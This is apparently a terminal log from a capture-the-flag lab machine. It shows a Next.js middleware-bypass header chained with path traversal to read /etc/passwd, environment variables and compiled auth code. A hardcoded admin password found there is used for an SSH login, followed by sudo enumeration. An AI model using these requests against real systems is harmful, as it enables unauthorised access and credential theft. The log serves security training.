Du:: Progress: [4242/74332] :: Job [1/1] :: 176 req/sec :: Du:: Progress: [4248/74332] :: Job [1/1] :: 185 req/sec :: Du:: Progress: [4288/74332] :: Job [1/1] :: 187 req/sec :: Du:: Progress: [4289/74332] :: Job [1/1] :: 166 req/sec :: Du:: Progress: [4328/74332] :: Job [1/1] :: 202 req/sec :: Du:: Progress: [4338/74332] :: Job [1/1] :: 177 req/sec :: Du:: Progress: [4362/74332] :: Job [1/1] :: 161 req/sec :: Du:: Progress: [4379/74332] :: Job [1/1] :: 177 req/sec :: Du:: Progress: [4408/74332] :: Job [1/1] :: 197 req/sec :: Du:: Progress: [4426/74332] :: Job [1/1] :: 175 req/sec :: Du:: Progress: [4448/74332] :: Job [1/1] :: 198 req/sec :: Du:: Progress: [4459/74332] :: Job [1/1] :: 182 req/sec :: Du:: Progress: [4493/74332] :: Job [1/1] :: 180 req/sec :: Du:: Progress: [4493/74332] :: Job [1/1] :: 180 req/sec :: Du:: Progress: [4502/74332] :: Job [1/1] :: 153 req/sec :: Du:: Progress: [4521/74332] :: Job [1/1] :: 142 req/sec :: Du:: Progress: [4525/74332] :: Job [1/1] :: 135 req/sec :: Du:: Progress: [4562/74332] :: Job [1/1] :: 146 req/sec :: Du:: Progress: [4568/74332] :: Job [1/1] :: 139 req/sec :: Du:: Progress: [4603/74332] :: Job [1/1] :: 141 req/sec :: Du:: Progress: [4608/74332] :: Job [1/1] :: 138 req/sec :: Du:: Progress: [4645/74332] :: Job [1/1] :: 137 req/sec :: Du:: Progress: [4652/74332] :: Job [1/1] :: 135 req/sec :: Du:: Progress: [4685/74332] :: Job [1/1] :: 136 req/sec :: Du:: Progress: [4693/74332] :: Job [1/1] :: 149 req/sec :: Du:: Progress: [4725/74332] :: Job [1/1] :: 187 req/sec :: Du:: Progress: [4741/74332] :: Job [1/1] :: 172 req/sec :: Du:: Progress: [4767/74332] :: Job [1/1] :: 180 req/sec :: Du:: Progress: [4790/74332] :: Job [1/1] :: 173 req/sec :: Du:: Progress: [4811/74332] :: Job [1/1] :: 183 req/sec :: Du:: Progress: [4837/74332] :: Job [1/1] :: 172 req/sec :: Du:: Progress: [4854/74332] :: Job [1/1] :: 190 req/sec :: Du:: Progress: [4886/74332] :: Job [1/1] :: 186 req/sec :: Du:: Progress: [4894/74332] :: Job [1/1] :: 188 req/sec :: Du:: Progress: [4924/74332] :: Job [1/1] :: 174 req/sec :: Du:: Progress: [4936/74332] :: Job [1/1] :: 176 req/sec :: Du:: Progress: [4974/74332] :: Job [1/1] :: 192 req/sec :: Du:: Progress: [4982/74332] :: Job [1/1] :: 174 req/sec :: Du:: Progress: [5014/74332] :: Job [1/1] :: 197 req/sec :: Du:: Progress: [5028/74332] :: Job [1/1] :: 177 req/sec :: Du:: Progress: [5054/74332] :: Job [1/1] :: 194 req/sec :: Du:: Progress: [5065/74332] :: Job [1/1] :: 178 req/sec :: Du:: Progress: [5094/74332] :: Job [1/1] :: 192 req/sec :: Du:: Progress: [5105/74332] :: Job [1/1] :: 175 req/sec :: Du:: Progress: [5137/74332] :: Job [1/1] :: 178 req/sec :: Du:: Progress: [5147/74332] :: Job [1/1] :: 167 req/sec :: Du:: Progress: [5185/74332] :: Job [1/1] :: 179 req/sec :: Du:: Progress: [5190/74332] :: Job [1/1] :: 169 req/sec :: Du:: Progress: [5204/74332] :: Job [1/1] :: 156 req/sec :: Du:: Progress: [5231/74332] :: Job [1/1] :: 164 req/sec :: Du:: Progress: [5256/74332] :: Job [1/1] :: 165 req/sec :: Du:: Progress: [5274/74332] :: Job [1/1] :: 166 req/sec :: Du:: Progress: [5310/74332] :: Job [1/1] :: 183 req/sec :: Du:: Progress: [5314/74332] :: Job [1/1] :: 166 req/sec :: Du:: Progress: [5350/74332] :: Job [1/1] :: 184 req/sec :: Du:: Progress: [5357/74332] :: Job [1/1] :: 165 req/sec :: Du:: Progress: [5391/74332] :: Job [1/1] :: 185 req/sec :: Du:: Progress: [5411/74332] :: Job [1/1] :: 181 req/sec :: Du:: Progress: [5434/74332] :: Job [1/1] :: 189 req/sec :: Du:: Progress: [5460/74332] :: Job [1/1] :: 178 req/sec :: Du:: Progress: [5476/74332] :: Job [1/1] :: 187 req/sec :: Du:: Progress: [5510/74332] :: Job [1/1] :: 187 req/sec :: Du:: Progress: [5516/74332] :: Job [1/1] :: 191 req/sec :: Du:: Progress: [5555/74332] :: Job [1/1] :: 191 req/sec :: Du:: Progress: [5568/74332] :: Job [1/1] :: 179 req/sec :: Du:: Progress: [5596/74332] :: Job [1/1] :: 197 req/sec :: Du:: Progress: [5621/74332] :: Job [1/1] :: 181 req/sec :: Duexample [Status: 404, Size: 26, Words: 3, Lines: 1, Duration: 216ms]
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl 'http://previous.htb/api/download?example=aaa' -H 'X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware' -v | more
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Host previous.htb:80 was resolved.
* IPv6: (none)
* IPv4: 10.10.11.83
* Trying 10.10.11.83:80...
* Connected to previous.htb (10.10.11.83) port 80
* using HTTP/1.x
> GET /api/download?example=aaa HTTP/1.1
> Host: previous.htb
> User-Agent: curl/8.13.0
> Accept: /
> X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware
>
* Request completely sent off
< HTTP/1.1 404 Not Found
< Server: nginx/1.18.0 (Ubuntu)
< Date: Thu, 04 Sep 2025 05:42:08 GMT < Content-Type: application/json; charset=utf-8
< Content-Length: 26
< Connection: keep-alive
< ETag: "c8wflmak5q"
< Vary: Accept-Encoding
<
{ [26 bytes data]
100 26 100 26 0 0 52 0 --:--:-- --:-100 26 100 26 0 0 52 0 --:--:-- --:--:-- --:--:-- 52
* Connection #0 to host previous.htb left intact
{"error":"File not found"}
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl 'http://previous.htb/api/download?example=../../../../etc/passwd' -H 'X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware' -v | more
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Host previous.htb:80 was resolved.
* IPv6: (none)
* IPv4: 10.10.11.83
* Trying 10.10.11.83:80...
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Connected to previous.htb (10.10.11.83) port 80
* using HTTP/1.x
> GET /api/download?example=../../../../etc/passwd HTTP/1.1
> Host: previous.htb
> User-Agent: curl/8.13.0
> Accept: /
> X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware
>
* Request completely sent off
< HTTP/1.1 200 OK
< Server: nginx/1.18.0 (Ubuntu)
< Date: Thu, 04 Sep 2025 05:46:17 GMT
< Content-Type: application/zip
< Content-Length: 787
< Connection: keep-alive
< Content-Disposition: attachment; filename=../../../../etc/passwd
< ETag: "41amqg1v4m26j"
<
{ [787 bytes data]
100 787 100 787 0 0 1788 0 --:--:-- --:--:-- --:--:-- 1788
* Connection #0 to host previous.htb left intact
root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
node:x:1000:1000::/home/node:/bin/sh
nextjs:x:1001:65533::/home/nextjs:/sbin/nologin
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl 'http://previous.htb/api/download?example=../../../../proc/self/environ' -H 'X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware' --output - | more
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:- 0 0 0 0 0 0 0 0 --:--:-- --:-100 216 100 216 0 0 472 0 --:--:-- --:--:-- --:--:-- 472
NODE_VERSION=18.20.8HOSTNAME=0.0.0.0YARN_VERSION=1.22.22SHL
VL=1PORT=3000HOME=/home/nextjsPATH=/usr/local/sbin:/usr/loc
al/bin:/usr/sbin:/usr/bin:/sbin:/binNEXT_TELEMETRY_DISABLED
=1PWD=/appNODE_ENV=production
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl 'http://previous.htb/api/download?example=../../../../app/.next/routes-manifest.json' -H 'X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware' -s | jq .
{
"version": 3,
"pages404": true,
"caseSensitive": false,
"basePath": "",
"redirects": [
{
"source": "/:path+/",
"destination": "/:path+",
"internal": true,
"statusCode": 308,
"regex": "^(?:/((?:[^/]+?)(?:/(?:[^/]+?))*))/$"
}
],
"headers": [],
"dynamicRoutes": [
{
"page": "/api/auth/[...nextauth]",
"regex": "^/api/auth/(.+?)(?:/)?$",
"routeKeys": {
"nxtPnextauth": "nxtPnextauth"
},
"namedRegex": "^/api/auth/(?<nxtPnextauth>.+?)(?:/)?$"
},
{
"page": "/docs/[section]",
"regex": "^/docs/([^/]+?)(?:/)?$",
"routeKeys": {
"nxtPsection": "nxtPsection"
},
"namedRegex": "^/docs/(?<nxtPsection>[^/]+?)(?:/)?$"
}
],
"staticRoutes": [
{
"page": "/",
"regex": "^/(?:/)?$",
"routeKeys": {},
"namedRegex": "^/(?:/)?$"
},
{
"page": "/docs",
"regex": "^/docs(?:/)?$",
"routeKeys": {},
"namedRegex": "^/docs(?:/)?$"
},
{
"page": "/docs/components/layout",
"regex": "^/docs/components/layout(?:/)?$",
"routeKeys": {},
"namedRegex": "^/docs/components/layout(?:/)?$"
},
{
"page": "/docs/components/sidebar",
"regex": "^/docs/components/sidebar(?:/)?$",
"routeKeys": {},
"namedRegex": "^/docs/components/sidebar(?:/)?$"
},
{
"page": "/docs/content/examples",
"regex": "^/docs/content/examples(?:/)?$",
"routeKeys": {},
"namedRegex": "^/docs/content/examples(?:/)?$"
},
{
"page": "/docs/content/getting-started",
"regex": "^/docs/content/getting\\-started(?:/)?$",
"routeKeys": {},
"namedRegex": "^/docs/content/getting\\-started(?:/)?$"
},
{
"page": "/signin",
"regex": "^/signin(?:/)?$",
"routeKeys": {},
"namedRegex": "^/signin(?:/)?$"
}
],
"dataRoutes": [],
"rsc": {
"header": "RSC",
"varyHeader": "RSC, Next-Router-State-Tree, Next-Router-Prefetch, Next-Router-Segment-Prefetch",
"prefetchHeader": "Next-Router-Prefetch",
"didPostponeHeader": "x-nextjs-postponed",
"contentTypeHeader": "text/x-component",
"suffix": ".rsc",
"prefetchSuffix": ".prefetch.rsc",
"prefetchSegmentHeader": "Next-Router-Segment-Prefetch",
"prefetchSegmentSuffix": ".segment.rsc",
"prefetchSegmentDirSuffix": ".segments"
},
"rewriteHeaders": {
"pathHeader": "x-nextjs-rewritten-path",
"queryHeader": "x-nextjs-rewritten-query"
},
"rewrites": []
}
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # curl 'http://previous.htb/api/download?example=../../../../app/.next/server/pages/api/auth/%5B...nextauth%5D.js' -H 'X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware' | more
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:- 0 0 0 0 0 0 0 0 --:--:-- --:-100 1537 100 1537 0 0 3197 0 --:--:-- --:--:-- --:--:-- 3202
"use strict";(()=>{var e={};e.id=651,e.ids=[651],e.modules=
{3480:(e,n,r)=>{e.exports=r(5600)},5600:e=>{e.exports=requi
re("next/dist/compiled/next-server/pages-api.runtime.prod.j
s")},6435:(e,n)=>{Object.defineProperty(n,"M",{enumerable:!
0,get:function(){return function e(n,r){return r in n?n[r]:
"then"in n&&"function"==typeof n.then?n.then(n=>e(n,r)):"fu
nction"==typeof n&&"default"===r?n:void 0}}})},8667:(e,n)=>
{Object.defineProperty(n,"A",{enumerable:!0,get:function(){
return r}});var r=function(e){return e.PAGES="PAGES",e.PAGE
S_API="PAGES_API",e.APP_PAGE="APP_PAGE",e.APP_ROUTE="APP_RO
UTE",e.IMAGE="IMAGE",e}({})},9832:(e,n,r)=>{r.r(n),r.d(n,{c
onfig:()=>l,default:()=>P,routeModule:()=>A});var t={};r.r(
t),r.d(t,{default:()=>p});var a=r(3480),s=r(8667),i=r(6435)
;let u=require("next-auth/providers/credentials"),o={sessio
n:{strategy:"jwt"},providers:[r.n(u)()({name:"Credentials",
credentials:{username:{label:"User",type:"username"},passwo
rd:{label:"Password",type:"password"}},authorize:async e=>e
?.username==="jeremy"&&e.password===(process.env.ADMIN_SECR
ET??"MyNameIsJeremyAndILovePancakes")?{id:"1",name:"Jeremy"
}:null})],pages:{signIn:"/signin"},secret:process.env.NEXTA
UTH_SECRET},d=require("next-auth"),p=r.n(d)()(o),P=(0,i.M)(
t,"default"),l=(0,i.M)(t,"config"),A=new a.PagesAPIRouteMod
ule({definition:{kind:s.A.PAGES_API,page:"/api/auth/[...nex
tauth]",pathname:"/api/auth/[...nextauth]",bundlePath:"",fi
lename:""},userland:t})}};var n=require("../../../webpack-a
pi-runtime.js");n.C(e);var r=n(n.s=9832);module.exports=r})
();
┌─[Krypt0n]-[DefaltXploit]-[CTF]
└──> ~ # ssh jeremy@previous.htb
jeremy@previous.htb's password:
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-152-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Thu Sep 4 05:50:20 AM UTC 2025
System load: 0.09 Processes: 215
Usage of /: 69.3% of 8.76GB Users logged in: 0
Memory usage: 8% IPv4 address for eth0: 10.10.11.83
Swap usage: 0%
Expanded Security Maintenance for Applications is not enabled.
1 update can be applied immediately.
1 of these updates is a standard security update.
To see these additional updates run: apt list --upgradable
1 additional security update can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu Sep 4 05:50:53 2025 from 10.10.14.25
jeremy@previous:~$ id
uid=1000(jeremy) gid=1000(jeremy) groups=1000(jeremy)
jeremy@previous:~$ whoami
jeremy
jeremy@previous:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
jeremy:x:1000:1000:,,,:/home/jeremy:/bin/bash
dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false
jeremy@previous:~$ sudo -l
[sudo] password for jeremy:
Sorry, try again.
[sudo] password for jeremy:
Matching Defaults entries for jeremy on previous:
!env_reset, env_delete+=PATH, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User jeremy may run the following commands on previous:
(root) /usr/bin/terraform -chdir\=/opt/examples apply
jeremy@previous:~$ ls -al
total 36
drwxr-x--- 4 jeremy jeremy 4096 Aug 21 20:24 .
drwxr-xr-x 3 root root 4096 Aug 21 20:09 ..
lrwxrwxrwx 1 root root 9 Aug 21 19:57 .bash_history -> /dev/null
-rw-r--r-- 1 jeremy jeremy 220 Aug 21 17:28 .bash_logout
-rw-r--r-- 1 jeremy jeremy 3771 Aug 21 17:28 .bashrc
drwx------ 2 jeremy jeremy 4096 Aug 21 20:09 .cache
drwxr-xr-x 3 jeremy jeremy 4096 Aug 21 20:09 docker
-rw-r--r-- 1 jeremy jeremy 807 Aug 21 17:28 .profile
-rw-rw-r-- 1 jeremy jeremy 150 Aug 21 18:48 .terraformrc
-rw-r----- 1 root jeremy 33 Sep 4 04:01 user.txt
jeremy@previous:~$ cat user.txt
b4b0379688c2834*********
05.09.2025, 04:33